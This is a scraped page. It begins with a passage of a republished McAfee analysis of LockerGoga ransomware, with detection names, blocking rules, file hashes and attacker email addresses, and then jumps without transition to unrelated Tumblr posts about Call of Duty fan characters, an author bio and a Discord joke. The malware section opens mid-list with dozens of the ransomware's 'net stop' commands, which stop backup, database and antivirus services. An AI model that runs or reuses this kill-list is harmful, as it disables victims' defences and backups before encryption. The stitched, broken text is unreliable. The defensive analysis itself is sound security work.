SQLAgent$TPS /y net stop VeeamBackupSvc /y net stop SQLAgent$TPSAMA /y net stop VeeamBrokerSvc /y net stop SQLAgent$VEEAMSQL2008R2 /y net stop SQLAgent$VEEAMSQL2012 /y net stop VeeamCatalogSvc /y net stop SQLBrowser /y net stop VeeamCloudSvc /y net stop SDRSVC /y net stop SQLSafeOLRService /y net stop SepMasterService /y net stop SQLSERVERAGENT /y net stop ShMonitor /y net stop SQLTELEMETRY /y net stop VeeamDeploymentService /y net stop NetMsmqActivator /y net stop VeeamDeploySvc /y net stop EhttpSrv /y net stop VeeamEnterpriseManagerSvc /y net stop ekrn /y net stop VeeamMountSvc /y net stop ESHASRV /y net stop VeeamNFSSvc /y net stop MSSQL$SOPHOS /y net stop VeeamRESTSvc /y net stop SQLAgent$SOPHOS /y net stop VeeamTransportSvc /y net stop AVP /y net stop W3Svc /y net stop klnagent /y net stop wbengine /y net stop MSSQL$SQLEXPRESS /y net stop WRSVC /y net stop SQLAgent$SQLEXPRESS /y net stop wbengine /y net stop MSSQL$VEEAMSQL2008R2 /y net stop kavfsslp /y net stop SQLAgent$VEEAMSQL2008R2 /y net stop VeeamHvIntegrationSvc /y net stop KAVFSGT /y net stop swi_update /y net stop KAVFS /y net stop SQLAgent$CXDB /y net stop mfefire /y net stop SQLAgent$CITRIX_METAFRAME /y net stop “SQL Backups” /y net stop “avast! Antivirus” /y net stop MSSQL$PROD /y net stop aswBcc /y net stop “Zoolz 2 Service” /y net stop “Avast Business Console Client Antivirus Service” /y net stop MSSQLServerADHelper /y net stop mfewc /y net stop SQLAgent$PROD /y net stop Telemetryserver /y net stop msftesql$PROD /y net stop WdNisSvc /y net stop WinDefend /y net stop EPUpdateService /y net stop MCAFEETOMCATSRV530 /y net stop TmPfw /y net stop MCAFEEEVENTPARSERSRV /y net stop SentinelAgent /y net stop MSSQLFDLauncher$ITRIS /y net stop SentinelHelperService /y net stop MSSQL$EPOSERVER /y net stop LogProcessorService /y net stop MSSQL$ITRIS /y net stop EPUpdateService /y net stop SQLAgent$EPOSERVER /y net stop TmPfw /y net stop SQLAgent$ITRIS /y net stop SentinelAgent /y net stop SQLTELEMETRY$ITRIS /y net stop SentinelHelperService /y net stop MsDtsServer130 /y net stop LogProcessorService /y net stop SSISTELEMETRY130 /y net stop EPUpdateService /y net stop MSSQLLaunchpad$ITRIS /y net stop TmPfw /y net stop BITS /y net stop SentinelAgent /y net stop BrokerInfrastructure /y net stop EPProtectedService /y net stop epag /y net stop epredline /y net stop EPIntegrationService /y net stop EPSecurityService /y

New ransomware, new features, but still room to improve

We will continue tracking LockerGoga, but we have already seen some interesting features never seen before, such as parallel tasking encrypting the system or log files for debugger purposes. We did not see any spreading method used to deliver LockerGoga so it would be fair to assume it is used in targeted campaigns after the attackers had access to the system. At the time of this analysis, all the samples are not packed, or have complex methods of protection from being executed inside a sandbox system, though this could change in the near future.

Also, during the analysis, we observed LockerGoga encrypting legitimate DLLs, breaking the functionality of certain applications in the system, and also ciphering itself during the process, causing a crash:

We expect all these errors will be fixed with further development of the malware.

Observations:

The McAfee ATR team is observing how some new ransomware players in the cybersecurity field are reusing, or at least only making some minor modifications to, some features used by other ransomware families.

In the case of LockerGoga we can observe the following in:

Sectigo as a certificate, also used to digitally sign the certificate

Ransom note slightly modified from Ryuk Ransomware

Specific FileMarker used to flag the encrypted files

No BTC address used in the ransom note, meaning victims must make contact directly by email, something that we have seen elsewhere in our latest investigations.

MITRE ATT&CK Coverage:

Hooking

Kernel Modules and Extensions

Process Injection

Code Signing

Query Registry

Process Discovery

Data Compressed

McAfee coverage:

Detection names: 

RansomCLock-FAL!A5BC1F94E750

Ransom-Goga!E11502659F6B

Trojan-Ransom

Ransom-Goga!438EBEC995AD

Trojan-FQSS!3B200C8173A9

RansomCLock-FAL!A1D732AA27E1

Ransom-Goga!C2DA604A2A46

Ransom-O

Trojan-FPYT!BA53D8910EC3

Ransom-FQPT!FAF4DE4E1C5D

RansomCLock-FAL!3EBCA21B1D4E

RansomCLock-FAL!E8C7C902BCB2

Ransom-Goga!E11502659F6B

Generic.bvg

Ransom-Goga!16BCC3B7F32C

Expert Rules

The following expert rules can be used in Endpoint Security to block the malware from spreading. These rules are aggressive and may cause false positives, so make sure they are removed once the environment is cleaned:

Rule {

Process {

Include OBJECT_NAME { -v “SYSTEM:REMOTE” }

}

Target {

Match FILE {

Include OBJECT_NAME { -v “c:\windows\temp\*.exe” }

Include OBJECT_NAME { -v “c:\windows\temp\*.bat” }

Include -access “CREATE”

}

}

}

Rule {

Process {

Include OBJECT_NAME { -v “WmiPrvSE.exe” }

}

Target {

Match PROCESS {

Include OBJECT_NAME { -v “cmd.exe”}

Include -access “CREATE”

}

}

}

Customers can also add the following Access Protection rule to prevent the creation of encrypted files on the victim host:

Executables:

Inclusion Status: Include

File Name or Path: *

SubRule:

SubRule:

Type: File

Operations: Create

Targets:

Target 1:

Include

Files: *.locked

Target 2:

Include

Destination file: *.locked

Customers can also add the following Access Protection rule to prevent the creation of encrypted files on the victim host:

File/Folder Access Protection Rule: Processes tInclude: *

File or folder name tblock: *.locked

File actions tprevent: New files being create

Access Protection Rules:

Customers can also add Access Protection rules matching these characteristics: Prevent CreationExecution of:

c:windowstempx??.bat

c:windowstempkill.bat

c:windowstemptaskhost.exe

Prevent execution of binaries signed with SN:

C=GB, PostalCode=DT3 4DD, S=WEYMOUTH, L=WEYMOUTH, STREET=16 Australia Road Chickerell,

O=MIKL LIMITED, CN=MIKL LIMITED

C=GB, PostalCode=WC2H 9JQ, S=LONDON, L=LONDON, STREET=71-75 Shelton Street Covent

Garden, O=ALISA LTD, CN=ALISA LTD

C=GB, PostalCode=EC1V 2NX, S=LONDON, L=LONDON, STREET=Kemp House 160 City Road,

O=KITTY’S LTD, CN=KITTY’S LTD

YARA RULE

We have a YARA rule available on our ATR github repository:

IOCs

a52f26575556d3c4eccd3b51265cb4e6

ba53d8910ec3e46864c3c86ebd628796

c2da604a2a469b1075e20c5a52ad3317

7e3f8b6b7ac0565bfcbf0a1e3e6fcfbc

3b200c8173a92c94441cb062d38012f6

438ebec995ad8e05a0cea2e409bfd488

16bcc3b7f32c41e7c7222bf37fe39fe6

e11502659f6b5c5bd9f78f534bc38fea

9cad8641ac79688e09c5fa350aef2094

164f72dfb729ca1e15f99d456b7cf811

52340664fe59e030790c48b66924b5bd

174e3d9c7b0380dd7576187c715c4681

3ebca21b1d4e2f482b3eda6634e89211

a1d732aa27e1ca2ae45a189451419ed5

e8c7c902bcb2191630e10a80ddf9d5de

4da135516f3da1c6ca04d17f83b99e65

a5bc1f94e7505a2e73c866551f7996f9

b3d3da12ca3b9efd042953caa6c3b8cd

faf4de4e1c5d8e4241088c90cfe8eddd

dece7ebb578772e466d3ecae5e2917f9

MayarChenot@protonmail[.]com

DharmaParrack@protonmail[.]com

wyattpettigrew8922555@mail[.]com

SayanWalsworth96@protonmail[.]com

SuzuMcpherson@protonmail[.]com

AbbsChevis@protonmail[.]com

QicifomuEjijika@o2[.]pl

RezawyreEdipi1998@o2[.]pl

AsuxidOruraep1999@o2[.]pl

IjuqodiSunovib98@o2[.]pl

aperywsqaroci@o2[.]pl

abbschevis@protonmail[.]com

asuxidoruraep1999@o2[.]pl

cottleakela@protonmail[.]com

couwetizotofo@o2[.]pl

dharmaparrack@protonmail[.]com

dutyuenugev89@o2[.]pl

phanthavongsaneveyah@protonmail[.]com

mayarchenot@protonmail[.]com

ijuqodisunovib98@o2[.]pl

qicifomuejijika@o2[.]pl

rezawyreedipi1998@o2[.]pl

qyavauzehyco1994@o2[.]pl

romanchukeyla@protonmail[.]com

sayanwalsworth96@protonmail[.]com

schreibereleonora@protonmail[.]com

suzumcpherson@protonmail[.]com

wyattpettigrew8922555@mail[.]com

The post LockerGoga Ransomware Family Used in Targeted Attacks appeared first on McAfee Blogs.

#gallery-0-5 { margin: auto; } #gallery-0-5 .gallery-item { float: left; margin-top: 10px; text-align: center; width: 33%; } #gallery-0-5 img { border: 2px solid #cfcfcf; } #gallery-0-5 .gallery-caption { margin-left: 0; } /* see gallery_shortcode() in wp-includes/media.php */

Go to Source Author: Marc Rivero Lopez LockerGoga Ransomware Family Used in Targeted Attacks Original Post from McAfee Author: Marc Rivero Lopez Initial discovery Once again, we have seen a significant new ransomware family in the news.

Ok so, update from me.

Eventually I will get around to finishing Oc bios, but today is not that day.

Instead, I’ll show you some OCs face claims and who they are.

Firstly, I will be changing Klaus Newman’s face claim, in time for reposting his bio in a few days time.

It’s Anthony Starr.

THEN.

We have two new Shadow OCs

There’s Oisín “Stray” Doherty

Helpmeithinkimightpassouthessohot

He is an officer, works pretty closely with Graves, but not second in command, but definitely respects the guy. He also makes it his other full time job to torment Stephanie’s life out (they are dating lol and she’d rather people not know, but he doesn’t care, he wants people to know). He endlessly flirts with her and sees how far he can take it before she’s beet red in the face.

Don’t let that fool you, though, he’s an efficient soldier, cold and calculated on the battlefield and knows his shit. He was demolitions so knows a lot about blowing shit up.

NEXT.

Lupita “Lupe” Hidalgo

Now this woman. 👀 she don’t take no shit. She is calm when necessary but will tell you you’re talking out of your ass when you need a reality check. She also works closely with Graves, but she eventually starts to question her place among the Shadows when they betrayed 141 and that night happened. Let’s just say moral differences cause her to question her place there. Does she stay? Leave? Give Graves a piece of her mind about the whole thing? Duh, course she does.

Anyway; feel free to ask about them if you want! But you’ll have to wait a lil bit for their bios to be done because if I’m honest, I have burn out, and physically writing makes me wanna vomit 😭 I’ll get there eventually lol.

Anyone got any short fic requests? I'll take like... the first 3 asks sent in and do like a little Drabble or smth in response. Can be for anyone in the cod franchise, either MW or Blops. Can be x reader, OC or whatever you want. I need a little kickstarter to get back into writing as I have some time on my hands and want to tackle smaller writing tasks than [stares are long form fic] that....

About Cipher

Name: Cipher Age: 26 D.O.B: 1st September Location: England, UK Timezone: BST/GMT

Side Blog: gentlecipher, reverent-recondite.

I am someone who really enjoys creating artwork on procreate and writing for my OCs and canon characters; you can find a lot of my written works on AO3 as well as on my Tumblr.

I am most active in the Call of Duty and Fire Emblem fandoms, but do dabble in other fandom spaces too.

My ask box is always open for questions and thoughts on anything I create, so feel free to message!

I'm also AuDHD!

If you are interested in a comprehensive list of OCs that belong to me, the please take the time to follow the link and have a read of their bios!

╚» OC Masterlist «╝ under construction.

Here you can find a link to a list of my writing works! This list has completed and planned works, as well as WIPs listed; just a little somewhere to highlight what I have and will write.

╚» Fanfiction «╝

Do not repost any of my art or writing on any other sites without first getting my consent unless it has been gifted to you.

Do not claim any art or writing as your own.

Thanks for reading,

Cipher <3

[Divider Credits: @/crazyfrm @/sweetmelodygraphics @/thecutestgrotto]

Does anyone who has discord ever look at how many channels on servers have messages, get overwhelmed by the thought of having to go through all of them because it’s a big task and so just press the “read all” so you can stop panicking?

Just me?

Ok 😭💀